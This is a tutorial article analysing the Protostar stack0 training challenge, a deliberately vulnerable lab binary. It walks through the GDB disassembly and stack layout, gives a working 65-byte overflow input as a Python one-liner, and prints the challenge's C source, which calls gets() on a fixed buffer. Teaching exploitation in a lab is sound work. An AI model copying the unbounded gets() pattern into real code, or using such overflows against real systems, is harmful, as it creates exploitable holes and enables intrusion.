Practical case: Buffer Overflow 0x01

This article was published on the 12th of September 2018. This article was updated on the 11th of May 2020, and on the 13th of September 2021.

The stack

The previous article explained the working of the stack and the way variables are stored on the stack. In this practical case, the stack0 challenge from Protostar will be analysed.
Protostar is a bootable ISO image with a Linux distribution (Debian), together with a set of challenges and certain tooling (e.g. Python and GDB). Most ‘modern’ safety measures have been disabled on the provided system, such as Address Space Layout Randomisation (ASLR) and Non-Executable (NX) memory.

The approach of this practical case differs from the original Protostar challenge, although the binary does not differ from the original challenge. The Protostar challenges provide the source code and the compiled binaries, after which the user has to find and exploit the weakness in each binary to complete the challenges. Using this open approach, the user can compare the source code (the binaries are written in C) and the assembly.

In this article, the analysis will be conducted without the source code. At the end of this case, a copy of the source code is embedded to use as a comparison after the whole analysis has been completed. This way, the goal of this chapter (assembly basics) is highlighted and this approach provides a better insight into the fundamental concepts that are behind the exploit. Additionally, it is good to know that the provided source code can be compiled as-is, but that the provided solution will not work due to security measures in modern operating systems and compilers. It is therefore required to use the provided Debian ISO.

Setting up the environment

After booting the ISO in a virtual machine using the provided live boot option, one can log in with the credentials user for both the username and the password. Then, one can use the command bash to use the ‘Bourne Again SHell’ (Bash) instead of the default shell. Using the command ip addr, the IP address of the machine can be found. Open a terminal (or PuTTY on Windows) and use SSH to connect to the machine, where [ip] equals the IP of the virtual machine:

ssh user@[ip]

The password remains user, since you now connect to the virtual machine from the host, instead of logging in locally. Connecting via SSH enables you to easily copy and paste data from and to the terminal, because the host’s clipboard can be used. Note that SSH is not required: the shared clipboard of the virtual machine can be enabled instead, or the commands can be typed manually.

Finding the binary

The binary can be found in the /opt/protostar/bin directory. Using the file program in bash, more details can be obtained:

user@protostar:/opt/protostar/bin$ file ./stack0
./stack0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

This provides more insight. Firstly, it is a 32-bit ELF executable which is not stripped. A stripped binary, which is the default during this course, does not contain symbols such as function names. These symbols save time during the analysis, as the name of a function often reveals its purpose. Additionally, the setuid bit is set on this binary. When such a binary is executed, it runs with the privileges of the owner of the file instead of those of the user who started it. If the owner is root (whose user ID is 0), the program can thus execute commands as root. This won't be of any importance in this challenge, but it does illustrate how much information the file command provides.
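The setuid property that file reports is a single bit in the mode of the file. As a minimal sketch, assuming Python 3 is available on the machine where the check is done, the same bit can be tested with the stat module from the standard library. The helper names mode_has_setuid and file_has_setuid are made up for this illustration.

```python
import os
import stat


def mode_has_setuid(mode):
    """Return True if the setuid bit is set in a st_mode value."""
    return bool(mode & stat.S_ISUID)


def file_has_setuid(path):
    """Return True if the file at the given path has the setuid bit set."""
    return mode_has_setuid(os.stat(path).st_mode)


# Two literal mode values for a regular file, written in octal:
# 0o104755 includes the setuid bit (the 4 in 4755), 0o100755 does not.
print(mode_has_setuid(0o104755))
print(mode_has_setuid(0o100755))
```

On the Protostar machine, calling file_has_setuid("/opt/protostar/bin/stack0") would be the equivalent of looking for the word setuid in the output of file.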

Executing the binary

Upon executing the program, it awaits input from the user and then prints a message:

user@protostar:/opt/protostar/bin$ ./stack0
[InputMessage]
Try again?

Note that the [InputMessage] is the place where it awaits the input before the execution continues.

GDB comes preinstalled on this system and will be the disassembler during this case. To open a file in GDB, simply provide the location of the file as the parameter in GDB:

cd /opt/protostar/bin
gdb ./stack0

To list all functions, use the info functions command. Note that gdb also has autocompletion upon pressing tab. The function naming scheme differs from the scheme in Radare2:

(gdb) info functions
All defined functions:

File stack0/stack0.c
int main(int, char**);

Non-debugging symbols:
0x080482bc  _init
0x080482fc  __gmon_start__
0x080482fc  __gmon_start__@plt
0x0804830c  gets
0x0804830c  gets@plt
0x0804831c  __libc_start_main
0x0804831c  __libc_start_main@plt
0x0804832c  puts
0x0804832c  puts@plt
0x08048340  _start
0x08048370  __do_global_dtors_aux
0x080483d0  frame_dummy
0x08048440  __libc_csu_fini
0x08048450  __libc_csu_init
0x080484aa  __i686.get_pc_thunk.bx
0x080484b0  __do_global_ctors_aux
0x080484dc  _fini

The function puts writes the provided string to the standard output, together with a trailing newline character. It is therefore logical to see puts in the list of functions, since the Try again? string was printed during the execution of the program. A call to printf in C can be compiled into a call to puts instead, for example when the format string contains no format specifiers and ends with a newline. Whether this happens depends on the compiler.

Another function which is worth looking at is the gets function. The manual pages that are present on most Linux distributions and on macOS (or online, if you have no access to those or are on a different platform) provide more information regarding the usage and workings of this function. To open the manual page, use the man gets command in the terminal.

FGETS(3)                 BSD Library Functions Manual                 FGETS(3)

NAME
     fgets, gets -- get a line from a stream

LIBRARY
     Standard C Library (libc, -lc)

SYNOPSIS
     #include <stdio.h>

     char *
     fgets(char * restrict str, int size, FILE * restrict stream);

     char *
     gets(char *str);

DESCRIPTION
     The fgets() function reads at most one less than the number of characters
     specified by size from the given stream and stores them in the string
     str.  Reading stops when a newline character is found, at end-of-file or
     error.  The newline, if any, is retained.  If any characters are read and
     there is no error, a `\0' character is appended to end the string.

     The gets() function is equivalent to fgets() with an infinite size and a
     stream of stdin, except that the newline character (if any) is not stored
     in the string.  It is the caller's responsibility to ensure that the
     input line, if any, is sufficiently short to fit in the string.

RETURN VALUES
     Upon successful completion, fgets() and gets() return a pointer to the
     string.  If end-of-file occurs before any characters are read, they
     return NULL and the buffer contents remain unchanged.  If an error
     occurs, they return NULL and the buffer contents are indeterminate.  The
     fgets() and gets() functions do not distinguish between end-of-file and
     error, and callers must use feof(3) and ferror(3) to determine which
     occurred.

ERRORS
     [EBADF]            The given stream is not a readable stream.

     The function fgets() may also fail and set errno for any of the errors
     specified for the routines fflush(3), fstat(2), read(2), or malloc(3).

     The function gets() may also fail and set errno for any of the errors
     specified for the routine getchar(3).

SECURITY CONSIDERATIONS
     The gets() function cannot be used securely.  Because of its lack of
     bounds checking, and the inability for the calling program to reliably
     determine the length of the next incoming line, the use of this function
     enables malicious users to arbitrarily change a running program's func-
     tionality through a buffer overflow attack.  It is strongly suggested
     that the fgets() function be used in all cases.  (See the FSA.)

SEE ALSO
     feof(3), ferror(3), fgetln(3), fgetws(3), getline(3)

STANDARDS
     The functions fgets() and gets() conform to ISO/IEC 9899:1999
     (``ISO C99'').

BSD                              June 4, 1993                              BSD

Other than the description, return value and the possible errors, this manual page provides us with a key piece of information for this challenge: the security considerations. Since gets performs no bounds checking, the input can be bigger than the buffer in which it is stored, resulting in an overflow. The buffer itself can be stored on the heap or the stack. In both cases, the excess bytes are written past the end of the buffer, overwriting the adjacent memory locations.

To disassemble a function in GDB, use the disassemble command, followed by the name of the function, which is main in this case:

(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:	push   %ebp
0x080483f5 <main+1>:	mov    %esp,%ebp
0x080483f7 <main+3>:	and    $0xfffffff0,%esp
0x080483fa <main+6>:	sub    $0x60,%esp
0x080483fd <main+9>:	movl   $0x0,0x5c(%esp)
0x08048405 <main+17>:	lea    0x1c(%esp),%eax
0x08048409 <main+21>:	mov    %eax,(%esp)
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    0x5c(%esp),%eax
0x08048415 <main+33>:	test   %eax,%eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	movl   $0x8048500,(%esp)
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	movl   $0x8048529,(%esp)
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret    
End of assembler dump.

Notice how the syntax of the assembly language differs from the one that has been used in this guide so far. This is the AT&T syntax, which is a different way of writing the same instructions: among other differences, the source operand comes before the destination operand, registers are prefixed with % and immediate values with $. To view the output in the Intel syntax, one needs to switch the disassembly-flavor in GDB to intel with the command: set disassembly-flavor intel. Then, run the disassemble main command again, which should provide the following output:

(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:	push   ebp
0x080483f5 <main+1>:	mov    ebp,esp
0x080483f7 <main+3>:	and    esp,0xfffffff0
0x080483fa <main+6>:	sub    esp,0x60
0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:	lea    eax,[esp+0x1c]
0x08048409 <main+21>:	mov    DWORD PTR [esp],eax
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:	test   eax,eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret    
End of assembler dump.

In the first few instructions, the stack frame is set up, the stack is aligned and space is reserved on the stack for the storage of local variables:

0x080483f4 <main+0>:	push   ebp
0x080483f5 <main+1>:	mov    ebp,esp
0x080483f7 <main+3>:	and    esp,0xfffffff0
0x080483fa <main+6>:	sub    esp,0x60

The subtraction of 0x60 is exactly what the program needs for the whole stack frame, but not necessarily the size of the variables in the main function. Subtracting more at once saves additional instructions later, thus optimising the code.
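The effect of these four instructions on the stack pointer can be followed with a bit of arithmetic. The sketch below models them in Python 3. The starting value of ESP is a made-up example and not a value taken from the Protostar machine, and the function name prologue is only used for this illustration.

```python
MASK_32 = 0xFFFFFFFF  # registers are 32 bits wide on this platform


def prologue(esp):
    """Model the four prologue instructions of main, returning (ebp, esp)."""
    esp = (esp - 4) & MASK_32      # push ebp: the stack grows downwards by 4 bytes
    ebp = esp                      # mov ebp,esp
    esp = esp & 0xFFFFFFF0         # and esp,0xfffffff0: round down to a multiple of 16
    esp = (esp - 0x60) & MASK_32   # sub esp,0x60: reserve 96 bytes
    return ebp, esp


# Hypothetical value of ESP upon entering main.
ebp, esp = prologue(0xBFFFF7BC)
print(hex(ebp), hex(esp))
```

The and instruction clears the lowest four bits of ESP, which moves the stack pointer down by 0 to 15 bytes. How many bytes of padding this creates between the reserved 0x60 bytes and the saved EBP therefore depends on the value of ESP at runtime.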

Then, the value of 0x0 (zero) is saved at ESP+0x5c:

0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0

This indicates that it is a variable, whose value is set to 0. Since the memory is already allocated on the stack with the optimised sub esp,0x60 instruction, the mov instruction saves the variable on the stack at the provided address.

Afterwards, the address of the second variable is loaded with the lea (load effective address) instruction:

0x08048405 <main+17>:	lea    eax,[esp+0x1c]
0x08048409 <main+21>:	mov    DWORD PTR [esp],eax

The lea instruction calculates the address that is described by the second operand and stores the result in the first operand. It does not read the memory at that address and it does not alter the registers that are used in the calculation. To illustrate this, assume that ESP equals 0x01, then the value in EAX would be 0x01+0x1c = 0x1d whilst ESP remains 0x01.

So the outcome of ESP+0x1c is saved in EAX, after which the value of EAX is written to the memory location that ESP points to (the top of the stack). This functions nearly the same as pushing EAX on the stack with the push eax instruction. The reason to use the mov instruction instead is compiler optimisation. The memory for the whole stack frame was allocated at once, so a push instruction would allocate an additional 4 bytes on the stack, needlessly using memory. It is therefore more efficient to use the already set stack pointer and save the result in the already allocated space.
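The two instructions at main+17 and main+21 can be mimicked in a few lines of Python 3. This is only a model: the dictionary named memory stands in for the stack, the helper names are invented for this sketch, and ESP uses the illustrative value 0x01 from the text rather than a realistic address.

```python
MASK_32 = 0xFFFFFFFF

memory = {}  # hypothetical sparse memory: address -> 32-bit value


def lea(base, displacement):
    """Compute base+displacement without reading memory, as lea does."""
    return (base + displacement) & MASK_32


def store_dword(address, value):
    """Write a 32-bit value to the given address, as mov DWORD PTR [address] does."""
    memory[address] = value & MASK_32


esp = 0x01                # illustrative value, as used in the text
eax = lea(esp, 0x1c)      # lea eax,[esp+0x1c]
store_dword(esp, eax)     # mov DWORD PTR [esp],eax

print(hex(eax))           # the calculated address
print(hex(esp))           # ESP itself is unchanged
print(hex(memory[esp]))   # the address now sits at the top of the stack
```

Unlike push eax, the store does not change ESP: the slot at the top of the stack already exists and is simply overwritten.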

The size of the second variable equals the address of the first variable minus the address of the second variable, in which ESP can be neglected, as it appears in both addresses: 0x5c – 0x1c = 0x40 bytes, which equals 64 bytes in decimal notation.

Then the gets function is called:

0x0804840c <main+24>:	call   0x804830c <gets@plt>

The gets function writes the obtained input to the buffer whose address it receives via the stack. This address was calculated by the previously mentioned lea instruction at main+17 and placed on the stack at main+21. When the input of the user is received, the gets function returns a pointer to the provided buffer in EAX. In the case of an error, NULL is returned. The program does not use this return value: the next instruction overwrites EAX with the value of the first variable, which is located at ESP+0x5c:

0x08048411 <main+29>:	mov    eax,DWORD PTR [esp+0x5c]

The EAX register is then compared with itself using the test instruction:

0x08048415 <main+33>:	test   eax,eax

Test performs a bit-wise logical AND operation and sets (amongst others) the Zero Flag (ZF) to 1 if the result of the AND operation is 0. If the result is not 0, the Zero Flag is set to 0, meaning it is not set.

A bit-wise logical AND operation on a value and itself results in that same value, meaning the result is only 0 if the value itself is 0. Since EAX is compared with itself, the Zero Flag is set as long as the first variable still contains the assigned value of 0. The next instruction is a conditional jump: if the Zero Flag has been set, the jump is taken.

0x08048417 <main+35>:	je     0x8048427 <main+51>
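The interplay between test and je can be modelled as follows. The sketch is written in Python 3 and only tracks the Zero Flag, whereas the real instruction updates several other flags as well. The function names and the returned labels are chosen for this illustration.

```python
MASK_32 = 0xFFFFFFFF


def zero_flag_after_test(a, b):
    """Return the Zero Flag (1 or 0) after test a,b on 32-bit operands."""
    return 1 if (a & b) & MASK_32 == 0 else 0


def next_location(first_variable):
    """Return the location in main where execution continues after the je."""
    eax = first_variable                # mov eax,DWORD PTR [esp+0x5c]
    zf = zero_flag_after_test(eax, eax) # test eax,eax
    if zf == 1:                         # je 0x8048427: taken when ZF is set
        return "main+51"
    return "main+37"                    # fall through to the next instruction


print(next_location(0))     # the variable still holds its initial value
print(next_location(0x61))  # the variable holds any other value
```

Only a value of 0 leads to main+51. Every non-zero value, regardless of which bits are set, falls through to main+37.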

Upon taking the jump, the following instructions remain before the end of the main function is reached:

0x08048427 <main+51>:	mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret

The puts function requires a pointer to a string as a parameter, which is why one can deduce that the mov instruction saves the address of a string on the stack before the call to the puts function is made. To know what string is provided to the puts function, one can use x/s [address] in GDB. The x stands for eXamine and the s requests the examined data in the form of a string. Logically, the provided address is the location which is examined. The string at 0x8048529 equals:

(gdb) x/s 0x8048529
0x8048529:	 "Try again?"

This is the output that is printed after the user input. If the jump is not taken, the main function ends differently:

0x08048419 <main+37>:	mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
[...]
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret

Note that the […] instructions are skipped due to the unconditional jump and are therefore not executed.

Upon examining the string located at 0x8048500, the result is:

(gdb) x/s 0x8048500
0x8048500:	 "you have changed the 'modified' variable"

So the first variable (the one that was set to zero in the beginning) is apparently named modified and should be changed to something other than its default value (which equals 0). If the value is not equal to 0, the bit-wise logical AND operation will not set the Zero Flag and the jump will not be taken.

Summary and approach

The modified integer, which equals 0 by default, should be altered to something other than 0. On the stack, the buffer of 64 bytes is located directly below the modified integer: the buffer starts at ESP+0x1c and the integer at ESP+0x5c (remember that the stack grows downwards, towards lower addresses). The user input is written from the start of the buffer towards higher addresses, and thus in the direction of the modified integer. The buffer is filled via a function that has no boundary checks.

From this short summary, the following approach can be deduced: provide an input bigger than the 64 byte buffer that is given to the gets function. This will also overflow into the modified variable, since it is next on the stack. Providing too many characters as an input would result in a segmentation fault, as the saved base pointer and the return address in the stack frame would get altered to invalid locations.
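Before trying this on the binary, the deduced layout can be checked with a small model. The sketch below, written for Python 3, represents the stack frame as an array of bytes and copies the input into it in the unbounded way gets does, including the terminating null byte. The offsets are taken from the disassembly. The SLACK constant and the function name simulate_gets are assumptions made for this model, and the memory above the frame (padding, saved EBP, return address) is not modelled in detail.

```python
import struct

FRAME_SIZE = 0x60        # bytes reserved by sub esp,0x60
BUFFER_OFFSET = 0x1c     # start of the buffer, relative to ESP
MODIFIED_OFFSET = 0x5c   # start of the modified variable, relative to ESP
SLACK = 16               # hypothetical room above the frame, contents not modelled


def simulate_gets(user_input):
    """Copy user_input into the modelled frame and return the value of modified."""
    memory = bytearray(FRAME_SIZE + SLACK)   # all zero, so modified starts at 0
    data = user_input + b"\x00"              # gets appends a terminating null byte
    end = BUFFER_OFFSET + len(data)
    if end > len(memory):
        raise ValueError("input exceeds the modelled memory")
    memory[BUFFER_OFFSET:end] = data         # no check against the buffer size
    raw = bytes(memory[MODIFIED_OFFSET:MODIFIED_OFFSET + 4])
    return struct.unpack("<I", raw)[0]       # little-endian 32-bit integer


for length in (64, 65, 68):
    print(length, hex(simulate_gets(b"a" * length)))
```

With 64 characters, only the terminating null byte lands in modified, which leaves its value at 0. The 65th character is the first one that changes the variable, and with 68 characters all four bytes of the integer are overwritten.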

The buffer can be overflowed manually by providing 65 (or 66, 67 or 68) characters when the program asks for input:

user@protostar:/opt/protostar/bin$ ./stack0
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
you have changed the 'modified' variable 

Note that more characters are allowed due to the additional space that is left on the stack, but characters 65 through 68 occupy the exact location of the modified variable on the stack. Providing more than 79 characters still yields the message that the modified variable has been changed, whilst also causing a segmentation fault.

Alternatively, the input can be generated with Python, which is more efficient and less prone to errors:

user@protostar:/opt/protostar/bin$ python -c 'print "a"*65' | ./stack0
you have changed the 'modified' variable
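The one-liner above uses the print statement of Python 2, which is a syntax error in Python 3. As a sketch, the same input can be generated by a short script that derives the length from the offsets in the disassembly instead of hard-coding 65. The names build_payload and overflow_bytes are invented for this example, and the script is not part of the Protostar material.

```python
import sys

BUFFER_SIZE = 0x5c - 0x1c  # distance between the two variables: 64 bytes


def build_payload(overflow_bytes=1, filler="a"):
    """Return an input line that fills the buffer and overwrites 1 to 4 bytes of modified."""
    if not 1 <= overflow_bytes <= 4:
        raise ValueError("modified is 4 bytes wide, so overflow_bytes must be 1 to 4")
    if len(filler) != 1 or filler in ("\n", "\x00"):
        raise ValueError("filler must be one character, not a newline or null byte")
    # The trailing newline ends the line that gets reads.
    return filler * (BUFFER_SIZE + overflow_bytes) + "\n"


if __name__ == "__main__":
    sys.stdout.write(build_payload())
```

Saved under a name of choice, the output of the script can be piped into ./stack0 in the same way as the output of the one-liner.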

Source code

The source code of the challenge, as provided by Protostar:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
 
int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
 
  modified = 0;
  gets(buffer);
 
  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The next article regarding the “Crash course” can be found here.


To contact me, you can e-mail me at [info][at][maxkersten][dot][nl], or DM me on Twitter @Libranalysis.